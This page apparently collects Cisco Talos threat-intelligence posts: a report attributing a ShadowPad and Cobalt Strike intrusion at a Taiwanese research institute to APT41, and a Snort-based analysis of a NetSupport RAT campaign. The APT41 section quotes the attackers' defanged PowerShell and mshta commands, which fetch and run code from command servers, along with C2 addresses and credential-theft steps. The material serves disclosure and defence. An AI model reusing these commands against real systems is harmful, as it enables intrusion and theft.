APT41 is a prolific and dangerous threat actor that all users and cybersecurity practitioners should be keeping track of. The group, also known as Amoeba, Bronze Atlas, Wicked Spider, and more, is known for carrying out Chinese state-sponsored espionage activity and other financially motivated cybercrimes. We have also uncovered that APT41 created a tailored loader to inject a proof of concept for CVE-2018-0824, a remote code execution vulnerability in Microsoft COM for Windows, directly into memory to achieve local privilege escalation. 

**So now what? **

This threat actor commonly tries to exploit CVE-2018-0824, which Microsoft has long had a patch available for. Users should ensure all Windows systems are up to date to the latest version to protect against this vulnerability (and the hundreds of others that exist in Windows anyway!). Additionally, Talos has released new ClamAV signatures and Snort rules to detect the ShadowPad malware and Cobalt Strike beacons used by APT41.  

**Top security headlines of the week **

**Another Microsoft outage just days after the massive CrowdStrike-related incident was the result of a cyber attack, according to the company.** The outage Wednesday morning affected Microsoft Outlook and the video game “Minecraft” for almost 10 hours and forced thousands of users to report issues. The incident gained increased interest in the wake of a massive outage last weekend that resulted in international disruptions and tens of millions of dollars in damages. Microsoft stated after the outage was resolved that the initial issue was caused by a distributed denial-of-service attack, and additional mitigations to defend against that DDoS attack failed. A notification on Microsoft’s website said the outage affected Microsoft Azure, the cloud platform that powers many of its services, and Microsoft 365. It also said cloud systems Intune and Entra were affected. Even though Microsoft had no direct involvement in the previous outage, the company has been under a microscope since the incident. That outage was caused by a faulty update to CrowdStrike Falcon that was pushed to many versions of Windows 11. (BBC, Forbes) 

**A new version of the Mandrake Android spyware appears to be spreading through phony apps on the Google Play store.** The revised spyware, used to unknowingly track users’ location and activity on their mobile devices, has been downloaded more than 32,000 times since 2022, according to new research. The original version of Mandrake was active between two periods, one in 2016 and 2017 and another between 2018 and 2020. Besides the usual spyware functions, Mandrake can completely wipe a device with a killswitch, leaving no trace of the malware. Spyware commonly targets highly vulnerable individuals, including politicians, activists and journalists. Spouses and romantic partners may also use it to unknowingly track their significant others. The most popular fake app used was AirFS, an advertised file-sharing app, that was downloaded more than 30,000 times before it was removed from the Google Play store. Once the user installs the phony app, the Mandrake malware is unknowingly installed, and it asks for the user’s permission to draw overlays on their screen under the guise of the illegitimate app. (Bleeping Computer, Security Affairs) 

**North Korean APT Andariel is accused of carrying out a series of espionage-focused campaigns targeting U.S. weapon systems over the past two years.** Security researchers say the state-sponsored group targeted healthcare providers, defense contractors and nuclear facilities, possibly to steal information that could improve the country’s own weapons programs. North Korea is constantly using its posession of nuclear weapons to try and intimidate Western countries. Separately, the U.S. indicted a North Korean citizen for his alleged involvement in several cyber attacks against American hospitals. The individual, suspected of having ties to North Korea’s Reconnaissance General Bureau, allegedly targeted hospitals in Florida and Kansas, healthcare providers in Arkansas and Connecticut, and a clinic in Colorado. The U.S. State Department is offering a reward of up to $10 million for information that leads to the arrest of Rim Jong Hyok. (The Record, CNN) 

**Can’t get enough Talos? **

*   Ransomware and email attacks are hitting businesses more than ever before 
*   Cisco Talos: An oral history 
*   Vulnerability Roundup: Out-of-bounds read vulnerability in NVIDIA driver; Open-source flashcard software contains multiple security issues 
*   Talos Takes Ep. #192: Threat actor trends and the most prevalent malware from the past quarter 

**Upcoming events where you can find Talos **

**_BlackHat USA_** **_(Aug. 3 – 8)_** 

_Las Vegas, Nevada_ 

**_Defcon_** **_(Aug. 8 – 11)_** 

_Las Vegas, Nevada_ 

**_BSides Krakow_** **_(Sept. 14)_**  

_Krakow, Poland_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
**MD5:** 8c69830a50fb85d8a794fa46643493b2  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Dropper.Generic::1201

**SHA 256:** 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d  
**MD5:** fd743b55d530e0468805de0e83758fe9  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** W32.File.MalParent

**SHA 256:** 24283c2eda68c559f85db7bf7ccfe3f81e2c7dfc98a304b2056f1a7c053594fe  
**MD5:** 49ae44d48c8ff0ee1b23a310cb2ecf5a  
**Typical Filename:** nYzVlQyRnQmDcXk  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a  
**MD5:** 200206279107f4a2bb1832e3fcd7d64c  
**Typical Filename:** lsgkozfm.bat  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

There is no real fix to the security issues recently found in GitHub and other similar software

ShadowPad, widely considered the successor of PlugX, is a modular remote access trojan (RAT) only seen sold to Chinese hacking groups.

Thursday, August 1, 2024 08:00

*   Cisco Talos discovered a malicious campaign that compromised a Taiwanese government-affiliated research institute that started as early as July 2023, delivering the ShadowPad malware, Cobalt Strike and other customized tools for post-compromise activities.
*   The activity conducted on the victim endpoint matches the hacking group APT41, alleged by the U.S. government to be comprised of Chinese nationals. Talos assesses with medium confidence that the combined usage of malware, open-source tools and projects, procedures and post-compromise activity matches this group’s usual methods of operation.
*   The ShadowPad malware used in the current campaign exploited an outdated vulnerable version of Microsoft Office IME binary as a loader to load the customized second-stage loader for launching the payload.
*   We also discovered that APT41 created a tailored loader to inject a proof-of-concept for CVE-2018-0824 directly into memory, utilizing a remote code execution vulnerability to achieve local privilege escalation.

**Taiwanese Government-Affiliated Research Institute compromised by Chinese Actor**

In August 2023, Cisco Talos detected abnormal PowerShell commands connecting to an IP address to download and execute PowerShell scripts in the environment of a Taiwanese government-affiliated research institute. The victim in this attack was a research institute in Taiwan, affiliated with the government, that specializes in computing and associated technologies. The nature of research and development work carried out by the entity makes it a valuable target for threat actors dedicated to obtaining proprietary and sensitive technologies of interest to them.

**Chinese Threat Actors likely Behind the Attacks**

Cisco Talos assesses with medium confidence that this campaign is carried out by APT41, alleged by the U.S. government to be comprised of Chinese nationals. This assessment is based primarily on overlaps in tactics, techniques and procedures (TTPs), infrastructure and malware families used exclusively by Chinese APT groups. Talos’ analyses of the malware loaders used in this attack reveal that these are ShadowPad loaders. However, Talos has been unable to retrieve the final ShadowPad payloads used by the attackers.

ShadowPad, widely considered the successor of PlugX, is a modular remote access trojan (RAT) only seen sold to Chinese hacking groups. The malware was publicly reported being used by APT41, which is a hacking group believed to be based out of Chengdu, China, according to the U.S. Department of Justice.  Along with APT41 it has also been used by other Chinese hacking groups like Mustang Panda and the Tonto Team.

During the investigation, we observed a couple TTPs or IoC that were observed in previous reported campaigns, including the following:

*   **The same second stage loader binary**: A second stage loader, that acts as a successor to the initial side-loaded ShadowPad loader, discovered by Talos was also linked to ShadowPad  and previously associated with ShadowPad publicly. We have also observed identical loading mechanisms, infection chains and file names being utilized in the current attacks with reliable previous open-source reporting.  
*   **Infrastructure overlapping:** Beside the binary connection, we also found a C2 (103.56.114\[.\]69) that was reported by Symantec. Although the campaign reportedly ran in April 2022, which is more than one year before the campaign we discovered, there were a few similarities between the TTPs observed in the two campaigns. This includes using the same ShadowPad Bitdefender loader, using similar file names for the tool, using Filezilla for moving files between endpoints and using the WebPass tool for dumping credentials. 
*   **The employment of Bitdefender executable for sideloading:** The malicious actor leverages Bitdefender where it uses an eleven year old executable to sideload the DLL-based ShadowPad loader. This technique has been seen in a variety of reports which have been attributed to APT41. This technique has been reported in multiple reports (Reports: 1, 2, 3, 4).

**Chinese Speaking Threat Actor**

This attack saw the use of a unique Cobalt Strike loader, written in GoLang is meant to evade detection of Cobalt Strike by Windows Defender. This loader is based on an anti-AV loader named CS-Avoid-Killing hosted on GitHub and written in Simplified Chinese. The repository is promoted in multiple Chinese hacking forums and technical tutorial articles.

The Cobalt Strike loader also consists of file and directory path strings in Simplified Chinese, indicating that the threat actors that built/compiled the loader were well-versed in the language.

__The Github repository of Cobalt Strike loader.__

__Technical tutorial article on making anti-AV__ __Cobalt Strike backdoor____.__

**Tactic, Technique and Procedure Analysis**

In August 2023, Cisco Talos detected abnormal PowerShell commands connected to an IP address to download PowerShell script for execution in the environment of the target. We performed an investigation based on our telemetry and found the earliest infiltration trace from mid July, 2023. We currently lacked sufficient evidence to conclusively determine the initial attack vector. The threat actor compromised three hosts in the targeted environment and was able to exfiltrate some documents from the network. 

Upon accessing the network, attackers start to gain a foothold by executing malicious code and binaries on the machine. On the machine with the web server, a webshell is installed to enable the threat actor’s ability to perform discovery and execution. The threat actors also dropped malwares including ShadowPad and Cobalt Strike with three different approaches: the installed webshell, RDP access and the reverse shell.

_Webshell drop_

C:/www/un/imjp14k.dll

C:/www/un/service.exe

C:/www/un/imjp14k.dll.dat

_RDP drop_

C:/Users/\[hide\]/Desktop/log.dll

C:/Users/\[hide\]/Desktop/imjp14k.dll

C:/Users/\[hide\]/Desktop/service.exe

C:/Users/\[hide\]/Desktop/imjp14k.dll.dat

C:/Users/\[hide\]/Desktop/log.dll.dat

_Reverse shell drop_

C:/Users/Public/calc.exe

C:/Users/Public/service.exe

C:/Users/Public/imjp14k.dll

C:/Users/Public/imjp14k.dll.dat

C:/Users/Public/log.dll

C:/Users/Public/log.dll.dat

We noticed that a couple of the ShadowPad components were detected and quarantined by our solution when being dropped. The threat actor  later changed their tactic to  bypass the detection.The first attempt was running the following PowerShell commands to launch the PowerShell script for downloading additional scripts (PowerShell and HTA) to run backdoor in memory.

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://103.56.114\[.\]69:8085/p.ps1');test123"

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://www.nss.com\[.\]tw/p.ps1');test123"

mshta https://www.nss.com\[.\]tw/1.hta

powershell -nop -w hidden 

\-encodedcommand “JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFM..."

However, the attempt was again detected and interrupted before the attackers could carry out further actions. Later on, the attackers used another two PowerShell commands to download Cobalt Strike malware from a compromised C2 server (www.nss.com\[.\]tw). The Cobalt Strike malware had been developed using an anti-AV loader to bypass AV detection and avoid the security product quarantine. The following command was used by the threat actor to download anti-AV malware and run the malware in the victim's host machine. A more detailed description about the Cobalt Strike loader can be found in the Malware and Malicious Tools Analysis. 

powershell (new\-object System.Net.WebClient).DownloadFile('https://www.nss.com\[.\]tw/calc.exe','C:/users/public/calc.exe');"

powershell (new\-object System.Net.WebClient).DownloadFile('https://www.nss.com\[.\]tw/calc.exe','C:/users/public/calc2.exe'); "

During the compromise the threat actor attempts to exploit CVE-2018-0824, with a tool called UnmarshalPwn, which we will detail in the sections below. 

The malicious actor is careful, in an attempt to avoid detection, during its activity executes “quser” which, when using RDP allows it to see who else is logged on the system. Hence the actor can stop its activity if any other use is on the system. Cisco Talos also noticed that once the backdoors are deployed the malicious actor will delete the webshell and guest account that allowed the initial access.

**Information gathering and exfiltration**

We observed the threat actor harvesting passwords from the compromised environment. The actor uses Mimikatz to harvest the hashes from the lsass process address space and WebBrowserPassView to get all credentials stored in the web browsers.

From the environment the actor executes several commands including using “net,” “whoami,” “quser,” “ipconfig,” “netstat,” and “dir” commands to obtain information on user accounts, directory structure, and network configurations from the compromised systems. In addition, we also observed query to the registry key to get the current state of software inventory collection on the system with the following command:

C:\\Windows\\system32\\reg.exe query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64

Beside running commands to discover the network, we also observed the ShadowPad sample perform lightweight network scanning to collect the hosts in the network. The malware tries to discover other machines in the same compromised network environment by connecting to the IPs under the same C class sequentially. The connections were all sent to port “53781”, with unknown reason. 

To exfiltrate a large number of files from multiple compromised machines, we observed threat actors using 7zip to compress and encrypt the files into an archive and later using backdoors to send the archive to the control and command server.

Although there is no new backdoor or hacking tools in this attack, we did find some interesting malware loaders. The threat actor leverages two major backdoors into their infection chains in this campaign, including both shadowPad and Cobalt Strike malware. Those two major backdoors were installed via webshell, reverse shell and RDP by the attacker themselves. In addition, two interesting hacking tools were also found, one is to get local privilege escalation and the other is to get web browser credentials. 

**ShadowPad Loader**

During our investigation of this campaign, we encountered two distinct iterations of ShadowPad. While both iterations utilized the same sideloading technique, they each exploited different vulnerable legitimate binaries to initiate the ShadowPad loader.

The initial variant of the ShadowPad loader had been previously discussed in 2020, and some vendors had referred to it as 'ScatterBee'. Its technical structure and the names of its multiple components have remained consistent with earlier reports.

The more recent variant of the ShadowPad loader targeted an outdated and susceptible version of the Microsoft Office IME imecmnt.exe binary, which is over 13 years old. Upon execution, this loader examines the current module for a specific byte sequence at offset 0xE367. Successful verification of the checksum prompts the loader to seek out and decrypt the "Imjp14k.dll.dat" payload for injection into the system's memory.

The imjp14k loader checksum

Furthermore, we conducted a pivot analysis of this latest loader using VirusTotal and other malware cloud repositories. We identified two different loader types, yet both employed the same legitimate binary to launch the malware.

*   G:\\Bee\\Bee6.2(HD)\\Src\\Dll\_3F\_imjp14k\\Release\\Dll\_3F\_imjp14k.pdb
*   G:\\Bee\\Tree\\Src\\Dll\_3F\_imjp14k\\Release\\Dll.pdb

Second type of imjp14k loader checksum

**Cobalt Strike “Anti-AV loader” from Chinese Open Source Project**

There is a Cobalt Strike loader also detected in this incident. With deep analysis for this loader, we found the loader not only packed with UPX but modified the section name to anti-unpack the malware. There are some interesting observations here suggesting that the adversary may be speaking Chinese. The loader was developed by Go programming language and string in the binary indicates a project name “go版本” which means “go version” in mandarin. Based on the project name we found that the code was cloned from a GitHub source that was written in simplified Chinese and the project is to avoid the Cobalt Strike being deleted by antivirus products.

Embedded project name

Upon analyzing the malware and GitHub page we found, we discovered that the attacker might have followed the GitHub steps to generate this loader and deploy the Cobalt Strike beacon to the victim's environment, the screenshots are shown this loader will get an encrypted picture from C2 server and the code logical same as the one on GitHub. 

Source code from github

Malware from the attack

It’s important to highlight that this cobalt strike beacon shellcode used steganography to hide in a picture and executed by this loader. In other words, its download, decryption, and execution routines all happen in runtime in memory. This Cobalt Strike beacon configuration shown below. 

{"C2Server": "http://45.85.76.18:443/yPc1", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\\r\\n"}

Unmarshal.exe malware decrypts its payload with four stages. The first stage is the executable file which will try to search \[filename\].tbin, and inject a first stage decryption payload, inject\_loader\_1.dll, in an allocated memory block. The first stage decryption payload will decompress second stage payload, inject\_loader\_2.dll, and injection into memory, the second stage payload will also try to search \*.dlls or ddb.dlls file for next stage payload. If it can not find the specific file, it will decrypt the final payload out and inject that payload into another memory block. After deep analysis, we found the final payload is UnmarshalPwn malware which is a POC for CVE-2018-0824 and uses a remote code execution vulnerability to get local privilege escalation. 

With the artifacts we found in this campaign, we pivoted and discovered some samples and infrastructure that were likely used by the same threat actors but in different campaigns. Although we don’t have further visibility into more details about these campaigns at the moment, we hope that by revealing this information, it would empower the community to connect the dots and leverage these insights for additional investigations.

We found 2 other ShadowPad loaders by pivoting the RICH PE header (978ece20137baea2bcb364b160eb9678) of the ShadowPad loader. Sharing the same RICH PE header indicates that these binaries share a similar compilation environment.

*   2e46fcadacfe9e2a63cfc18d95d5870de8b3414462bf14ba9e7c517678f235c9
*   eba3138d0f3d2385b55b08d8886b1018834d194440691d33d612402ba8a11d28

One of the loaders were observed downloaded from two C2 servers:

*   103.96.131\[.\]84
*   58.64.204\[.\]145

Beside the ShadowPad loader, we found the same Bitdefender loader (386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd) and a payload file on the C2 server. The ShadowPad payload connects to an interesting C2 domain w2.chatgptsfit\[.\]com for communication.

**Coverage**

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

ClamAV detections are also available for this threat:

Win.Packed.UnmarshalPwn-10019484-0

Win.Packed.CobaltStrike-10019485-0

Win.Loader.UnmarshalPwn-10019486-0

Win.Loader.Shadowpad-10019487-0 

**IOCs **

IOCs for this research can also be found at our GitHub repository here.

APT41 likely compromised Taiwanese government-affiliated research institute with ShadowPad and Cobalt Strike

In this first Deep Dive with NTDR, we explore how defenders can leverage Snort for the detection of evasive malware threats.

Thursday, August 1, 2024 06:00

_By Chris Morrison._

*   Cisco Talos is actively tracking multiple malware campaigns that utilize NetSupport RAT for persistent infections. 
*   These campaigns evade detection through obfuscation and updates. 
*   Snort can provide a strong defense before this malware reaches endpoints. 
*   In this first Deep Dive with NTDR, we explore how defenders can leverage Snort for the detection of evasive malware threats. 

In November 2023, security vendors identified a new NetSupport RAT campaign that used fake browser updates from compromised and malicious websites to trick users into downloading a stager that downloads and invokes PowerShell commands to install the NetSupport manager agent onto the victim’s machine and establish persistence. 

In January 2024, security researchers published another analysis of the same campaign, although with some differences in the initial JavaScript payload, which demonstrates a threat actor re-focusing on the obfuscation of the initial stager. There are also modifications observed in the agent installation including new paths for the randomized installation. 

So, Cisco Talos followed suit with our own in-depth analysis. We identified multiple obfuscation and evasion techniques being used by the campaign and created appropriate detection to keep users protected. By identifying specific weaknesses in the campaign’s obfuscation techniques and identifying indicators of compromise (IOCs), we can create highly accurate detection of this campaign. Talos is also in a unique position of having primarily open-source detection tools such as Snort and ClamAV. To highlight these capabilities, we will provide a detailed explanation of our detection methodology. 

**Campaign history **

NetSupport Manager has been commercially available for remote device administration since 1989. Like many tools in the IT remote support industry, NetSupport Manager has been weaponized by threat actors who either cannot or do not wish to develop their own RAT. Adversaries first started using NetSuport for malicious purposes in 2017, and at this point, most security vendors widely recognize this software as a RAT. The 2020s' shift to remote work for many office workers marked an increased use of NetSupport RAT in more phishing and drive-by download campaigns, as well as being used alongside other loaders. This campaign is the most notable use of NetSupport RAT in recent years, with hundreds of known stager variants across dozens of domains used in a large-scale malicious advertising campaign. 

**Component summary **

Components in VirusTotal graph. 

1.  Stage 1 is a JavaScript file that is downloaded from one of several malicious advertisements or compromised websites. It’s an obfuscated downloader, keeping a Stage 2 JavaScript and PowerShell payload in memory, which is the actual meat of the dropper. Stage 1 is obfuscated and embedded within otherwise benign JavaScript libraries. 
2.  In Stage 2, a PowerShell script is run via JavaScript. Both are obfuscated, and the PowerShell is embedded in the JavaScript, and the JavaScript is embedded within large comment blocks of random ASCII hex. The PowerShell makes another HTTP GET to retrieve the base64-encoded ZIP. On receipt, the PowerShell extracts the payload into a semi-random path, starts execution, and then establishes basic registry persistence. 
3.  The end payload is a completely portable install of the commercial NetSupport Manager RAT utility. Some of the installs come with additional scripts or slight filename changes to avoid more narrow detection. 

**Stage 1: JavaScript stager **

From 3b587d0c311e8ebc3bb104d564235c41ef8e64592c7419f17f48e0cee9ebc878. 

The screenshot above shows the normalized inner payload for an older version of the JavaScript Stage 1. In this older sample, the actual malicious code is embedded within an otherwise benign JavaScript library. Several libraries are used, including jQuery, moment.js and SheetJS. However, this stage's actual malicious payload is barely obfuscated. The next stage download URL is in plain text. The call to “activeXObject” to create the HTTP connection is in plain text. And similarly, the eval call is in plain text. 

From 01d867d552a06bd778c812810a476441681c4bebabf967e80f8024b3856cb03e 

Here, we have the normalized content of a very recent (first seen 2024.03.09) sample of the stager from the same campaign. Similarly to the older version, the malicious payload is wrapped in an otherwise benign library. Improving over the previous versions, the malicious payload within is further obfuscated with the open-source tool javascript-obfuscator. This results in the removal of the plaintext “activeXObject” and “eval,” however, the output pattern of JavaScript-obfuscator is highly identifiable, as every variable and function name is a random hexadecimal value prefixed by an underscore. 

Deobfuscated 01d867d552a06bd778c812810a476441681c4bebabf967e80f8024b3856cb03e 

The old and new samples shared two major features: All the obfuscation is pre-computed and not done on a per-download basis. This is observable through the fact that so many of the stages can be identified with common entry point functions after having been obfuscated with javascript-obfuscator. Also, the pre-obfuscated stagers are reused by stamping them with a new random download URL. This URL then ends up being in plain text as well so from identifying the highly unique function names from one stager, we can find many more and then automatically extract the download URLs from them statically, which is much faster than throwing them all in analysis sandboxes.  

Fast pattern-only rule for detection. 

**Stage 1 detection **

From a detection standpoint, we can use Snort to leverage a fast\_pattern-only file rule. This simple rule will only detect the given cluster of stagers being downloaded. However, since this is a fast\_pattern-only rule on highly unique text, we can put it in the more general Snort policy configurations since there is little overhead to running this rule. Additionally, the Snort 3 file rule will do all the abstraction from other protocols that can carry files, such as FTP and SMTP, letting us cast our coverage net over a broader attack surface in case this file is being transmitted through more ways than just the known malicious advertisement. 

**Stage 2: JavaScript & PowerShell dropper **

The second stage of the campaign is an in-memory payload downloaded by the on-disk JavaScript. This stage consists of a JavaScript function that then calls PowerShell. 

From 6f3681cd91f7a19c1cf2699e1f9f7b550dfe46841ab5171124e79979fae5424a 

 The JavaScript content is padded on either side by large, repeating, random comment blocks. The actual JavaScript is quite simple, a slightly obfuscated call to ActiveXObject(“WScript.Shell”), which allows the PowerShell command-line to be run. 

Deobfuscated from 6f3681cd91f7a19c1cf2699e1f9f7b550dfe46841ab5171124e79979fae5424a 

The PowerShell invocation is where most of the dropper’s work happens. PowerShell is run with the command line flags “-Ex Bypass” which sets the execution policy to “Bypass”, enabling unsigned execution, “-NoP” which is short for “-NoPolicy” and avoids the current user’s startup script, and “-C” which is short for “-command” and will run the following command line string as a PowerShell script. The commands themselves are a straightforward download of the next stage, which is a base64-encoded ZIP file that contains a portable installation of NetSupport Manager Agent. After downloading the payload, it is base64-decoded, written to disk, and then extracted to the target install folder. A check is run to make sure “client32.exe,” the main executable of the agent, exists in the output directory and then this file is run. Finally, a registry entry is made to establish user-level persistence of the agent on login. 

Interestingly, this stage is not obfuscated with the same techniques as the Stage 1 file. The PowerShell file is only slightly obfuscated through random variable names and string concatenations, and the JavaScript obfuscation uses the same techniques in addition to the mentioned large random comment blocks. Because this obfuscation is so limited, we can rely on static signatures in this case. If future versions of this stager are further obfuscated, using normalized content buffers in Snort such as js\_data can provide a consistent view into the payload. However, this payload has remained largely unchanged besides the payload URLs from November 2023 to March 2024. 

**Stage 2 detection **

For Snort detection, we can use a simple series of content that matches the content of the PowerShell script. The unobfuscated registry key for persistence combined with the PowerShell flags makes a great rule for potential malware dropper detection. We can narrow this even further with the inclusion of the client32.exe filename so that we know we are only alerting on this campaign and similar uses of NetSupport RAT. 

An additional trick would be the use of an HTTP service rule. In Snort 3, the service inspector can identify known services regardless of the port they are on, in contrast to Snort 2 where you will need to define HTTP\_PORTS ahead of time. Regardless of what port the attacker is hosting the HTTP payload on, our rule can detect the malicious content. 

This Snort rule identifies and prevents the current iteration of dropper payloads. A more holistic approach to defense would also include behavioral detection. Since we can observe this dropper’s behavior regardless of any text obfuscation, we will effectively forbid this technique on any protected endpoint and force the threat actor to change tactics. 

Example Sigma detection. 

 The Sigma behavioral rule language can encapsulate this detection quite well. This rule can detect most installs but will fail to identify obfuscations through renames or different registry keys. 

**Obfuscated NetSupport manager download **

Retreading a little bit, the PowerShell invocation downloads a base64-encoded ZIP file of an entire installation of NetSupport Manager agent. For NetSupport Manager and most other legitimate software packages, this is a highly unusual way for the package to be distributed. Most applications are installed via an MSI package or an EXE installer that downloads the full application without obfuscation. The client binaries are not obfuscated by the threat actor since obfuscating an existing compiled binary is more challenging than obfuscating the source code scripts identified in stage 1 and stage 2 files. Because of this, the unique DLLs that encompass most of the NetSupport Manager Client’s actual logic are not renamed. 

It might seem we will have to stream decode the base64 content and unzip it in memory to scan for malicious file contents; we can exploit two specific features of the ZIP in base64 format. The highly unique DLL names will all be close together in the ZIP archive central directory, the structure that holds the information on what files are in the archive. Second, base64 is not a random encoding, and we can pre-compute all three possible base64-encoded strings that represent any one given input. CyberChef has an excellent demonstration of how this works. This method involves the possible two-bit alignment positions within the six-bit encoding size of a given base64 character. Putting all this together means that we can pre-compute all the combinations of the base64-encoded DLL names as high-speed rules that are only looking for static content matches.  

The threat actors using NetSupport RAT in this campaign are typically looking for the fastest way to get a RAT agent into deployment. The threat actors who use NetSupport Manager are not putting a strong amount of effort into obfuscation of droppers, let alone the agents, so this is an effective rule for their non-standard download paths.  

**Additional Snort detections **

Talos has existing Snort coverage for NetSupport Manager Agent’s network activity leveraging SID 44678, which was created back in 2017. We also expanded this coverage in 2020, with the creation of SIDs 53539 - 53544 as the usage by malicious actors increased. For the latest campaign, we increased our coverage through a Snort feature that was not available before. File Rules are a feature only available in Snort 3 that allows the abstraction of file contents from the protocols that carry them, allowing us to write wider-reaching signatures. 

As the NetSupport RAT files are not typically obfuscated by threat actors and it is a legitimate commercial product with many specialized features, there are many opportunities to create detection against the files. For example, in both the EXE and DLLs, the full manufacturer and product information for NetSupport Manager Client is detailed. 

As other legitimate software binaries are unlikely to include the full metadata for NetSupport Manager, this gives us a great signature to work with that lets us cleanly identify the binaries without any heavy reverse engineering needed. Although Snort does not have a modifier for Unicode strings, Unicode text byte strings can be leveraged for detection. Once again, we can use the “file” rule target to throw our detection net over a much larger surface than just HTTP downloads. Other campaigns using NetSupport Manager RAT will be observable from this rule through Snort’s ability to inspect file streams from multiple protocols. 

Although NetSupport RAT continues to be used by malicious campaigns, its widespread use hinders those threat actors who are not willing to dedicate the resources to develop their own tools or more evasive techniques. And since this campaign is still active and updated, we may still observe these techniques being developed and deployed by this threat actor. For now, this gives us an example of when a threat is persistent but not advanced. 

**Indicators of Compromise **

Indicators of Compromise associated with this threat can be found here.